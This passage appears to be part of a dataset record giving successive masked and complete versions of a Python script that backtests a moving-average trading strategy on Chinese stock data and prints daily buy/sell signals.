stat.stdev(returns['Net return'])\n print('Net Profit =', net_profit,\n '\\n Total number of companies traded =', companies_traded,\n '\\n Mean Profit =', mean, \"\"\"\n Standard Deviation\"\"\", std)\n print(returns)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n daily_signal_checker('china_stocks.csv', location='chineseStocks/')\n\n\ndef update_portfolio():\n portfolio = pd.read_csv(portfolio)\n\n\ndef daily_signal_checker(stocks, location):\n ndays = 6\n stock_list = pd.read_csv(stocks)\n for code in stock_list['Code']:\n tmp = backtest_database(code, '2019-09-16', '2020-11-18', 1)\n df_stock = tmp.read_csv(location=location)\n open_price = float(tmp.get_today_open())\n print(open_price)\n df_stock = df_stock.append({'Open': open_price}, ignore_index=True)\n sim = mAvgSim.movingAverageSim(df_stock)\n signals = sim.produce_buy_sell(ndays=ndays)\n print('Company:', code, 'Signals:', signals)\n\n\ndef scrape_data(stock_list, location, start, end):\n for code in stock_list['Code']:\n print('Got Code:', code)\n tmp = backtest_database(code, start, end, 1)\n tmp.create_csv(location=location)\n\n\ndef test_stock_list(stock_list, location, ndays):\n returns = pd.DataFrame(columns=['Company', 'No. Trades', 'Net return',\n 'Test Error'])\n for code in stock_list['Code']:\n print(code)\n df_stock = backtest_database(code, '2019-09-16', '2020-02-17', 1\n ).read_csv(location=location)\n sim = mAvgSim.movingAverageSim(df_stock)\n net, num_trades, test_error = sim.run_simulation(ndays=ndays)\n if num_trades == 0:\n continue\n returns = returns.append({'Company': code, 'No. Trades': num_trades,\n 'Net return': net, 'Test Error': test_error}, ignore_index=True)\n print('Mean Test Error = ', np.mean(returns['Test Error']))\n net_profit = np.sum(returns['Net return'])\n companies_traded = len(returns)\n mean = stat.mean(returns['Net return'])\n std = stat.stdev(returns['Net return'])\n print('Net Profit =', net_profit,\n '\\n Total number of companies traded =', companies_traded,\n '\\n Mean Profit =', mean, \"\"\"\n Standard Deviation\"\"\", std)\n print(returns)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from datareader import *\nimport matplotlib.pyplot as plt\nfrom plotting import *\nfrom misc import *\nimport leastSquares as lsModel\nimport masim as mAvgSim\nimport numpy as np\nimport pandas as pd\nimport statistics as stat\nfrom datetime import datetime as dt\nfrom time import mktime\n\n\ndef main():\n daily_signal_checker('china_stocks.csv', location='chineseStocks/')\n\n\ndef update_portfolio():\n portfolio = pd.read_csv(portfolio)\n\n\ndef daily_signal_checker(stocks, location):\n ndays = 6\n stock_list = pd.read_csv(stocks)\n for code in stock_list['Code']:\n tmp = backtest_database(code, '2019-09-16', '2020-11-18', 1)\n df_stock = tmp.read_csv(location=location)\n open_price = float(tmp.get_today_open())\n print(open_price)\n df_stock = df_stock.append({'Open': open_price}, ignore_index=True)\n sim = mAvgSim.movingAverageSim(df_stock)\n signals = sim.produce_buy_sell(ndays=ndays)\n print('Company:', code, 'Signals:', signals)\n\n\ndef scrape_data(stock_list, location, start, end):\n for code in stock_list['Code']:\n print('Got Code:', code)\n tmp = backtest_database(code, start, end, 1)\n tmp.create_csv(location=location)\n\n\ndef test_stock_list(stock_list, location, ndays):\n returns = pd.DataFrame(columns=['Company', 'No. Trades', 'Net return',\n 'Test Error'])\n for code in stock_list['Code']:\n print(code)\n df_stock = backtest_database(code, '2019-09-16', '2020-02-17', 1\n ).read_csv(location=location)\n sim = mAvgSim.movingAverageSim(df_stock)\n net, num_trades, test_error = sim.run_simulation(ndays=ndays)\n if num_trades == 0:\n continue\n returns = returns.append({'Company': code, 'No. Trades': num_trades,\n 'Net return': net, 'Test Error': test_error}, ignore_index=True)\n print('Mean Test Error = ', np.mean(returns['Test Error']))\n net_profit = np.sum(returns['Net return'])\n companies_traded = len(returns)\n mean = stat.mean(returns['Net return'])\n std = stat.stdev(returns['Net return'])\n print('Net Profit =', net_profit,\n '\\n Total number of companies traded =', companies_traded,\n '\\n Mean Profit =', mean, \"\"\"\n Standard Deviation\"\"\", std)\n print(returns)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from datareader import *\nimport matplotlib.pyplot as plt\nfrom plotting import *\nfrom misc import *\nimport leastSquares as lsModel\nimport masim as mAvgSim\nimport numpy as np\nimport pandas as pd\nimport statistics as stat\nfrom datetime import datetime as dt\nfrom time import mktime\n\ndef main():\n\t# scrape_data(pd.read_csv('china_stocks.csv'),location='chineseStocks/',\n\t# \t\t\t\t\t\tstart='2019-09-16',end='2020-11-12')\n\t# cypt_scrape = backtest_database('LINK-USD','2019-09-16','2020-11-12',1)\n\t# cypt_scrape.create_csv('/Users/jimmylin/Desktop/Quant_Trading/Trading/')\n\t# df_stock = pd.read_csv('603131.csv')\n\t# df_cypt = pd.read_csv('LINK-USD.csv')\n\t# df_stock = backtest_database('603993.SS','2019-09-16','2020-11-17',1).read_csv(location='chineseStocks/')\n\t# sim = mAvgSim.movingAverageSim(df_stock)\n\t# sim = mAvgSim.movingAverageSim(df_cypt)\n\t# net,num_trades,test_error = sim.run_simulation(ndays=15)\n\t# sim.plot_graph()\n\t# test_stock_list(stock_list=pd.read_csv('china_stocks.csv'),location='chineseStocks/',ndays=4)\n\tdaily_signal_checker('china_stocks.csv',location='chineseStocks/')\n\t# update_open_close('china_stocks.csv',location='chineseStocks/')\n\t# tmp = backtest_database('300261.SZ','2019-09-16','2020-02-16',1)\n\t# df_stock = tmp.read_csv('chineseStocks/')\n\t# open_price = tmp.get_today_open()\n\t# df_stock = df_stock.append({'Open' : open_price},ignore_index=True)\n\t# sim = mAvgSim.movingAverageSim(df_stock)\n\t# sim.run_simulation(ndays=5)\n\t# signals = sim.produce_buy_sell(ndays=1)\n\t# print(signals)\n\ndef update_portfolio():\n\tportfolio = pd.read_csv(portfolio)\n\ndef daily_signal_checker(stocks,location):\n\tndays=6\n\t# Get updated stock prices (whole csv)\n\t# scrape_data(pd.read_csv(stocks),location='chineseStocks/',\n\t# \t\t\t\t\t\tstart='2019-09-16',end='2020-11-24')\n\t# Run through stock list to get opens and predict\n\tstock_list = pd.read_csv(stocks)\n\tfor code in stock_list['Code']:\n\t\ttmp = backtest_database(code,'2019-09-16','2020-11-18',1)\n\t\tdf_stock = tmp.read_csv(location=location)\n\t\topen_price = float(tmp.get_today_open())\n\t\t# print(code)\n\t\tprint(open_price)\n\t\tdf_stock = df_stock.append({'Open' : open_price},ignore_index=True)\n\t\tsim = mAvgSim.movingAverageSim(df_stock)\n\t\tsignals = sim.produce_buy_sell(ndays=ndays)\n\t\tprint(\"Company:\",code,\n\t\t\t\"Signals:\",signals)\n\ndef scrape_data(stock_list,location,start,end):\n\tfor code in stock_list['Code']:\n\t\tprint(\"Got Code:\",code)\n\t\ttmp = backtest_database(code,start,end,1)\n\t\ttmp.create_csv(location=location)\n\ndef test_stock_list(stock_list,location,ndays):\n\treturns = pd.DataFrame(columns=['Company','No. Trades','Net return','Test Error'])\n\tfor code in stock_list['Code']:\n\t\tprint(code)\n\t\tdf_stock = backtest_database(code,'2019-09-16','2020-02-17',1).read_csv(location=location)\n\t\tsim = mAvgSim.movingAverageSim(df_stock)\n\t\tnet,num_trades,test_error = sim.run_simulation(ndays=ndays)\n\t\tif num_trades == 0:\n\t\t\tcontinue\n\t\treturns = returns.append({\n\t\t\t'Company' : code,\n\t\t\t'No. 
Trades' : num_trades,\n\t\t\t'Net return' : net,\n\t\t\t'Test Error' : test_error\n\t\t},ignore_index=True)\n\t\t# print('Company:',code,'\\n Number of Trades',num_trades,'\\n Net % return',net)\n\tprint(\"Mean Test Error = \", np.mean(returns['Test Error']))\n\tnet_profit = np.sum(returns['Net return'])\n\tcompanies_traded = len(returns)\n\tmean = stat.mean(returns['Net return'])\n\tstd = stat.stdev(returns['Net return'])\n\tprint(\"Net Profit =\",net_profit,\n\t\t'\\n Total number of companies traded =',companies_traded,\n\t\t'\\n Mean Profit =',mean,\n\t\t'\\n Standard Deviation',std)\n\tprint(returns)\n\n\nif __name__ == \"__main__\":\n\tmain()\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |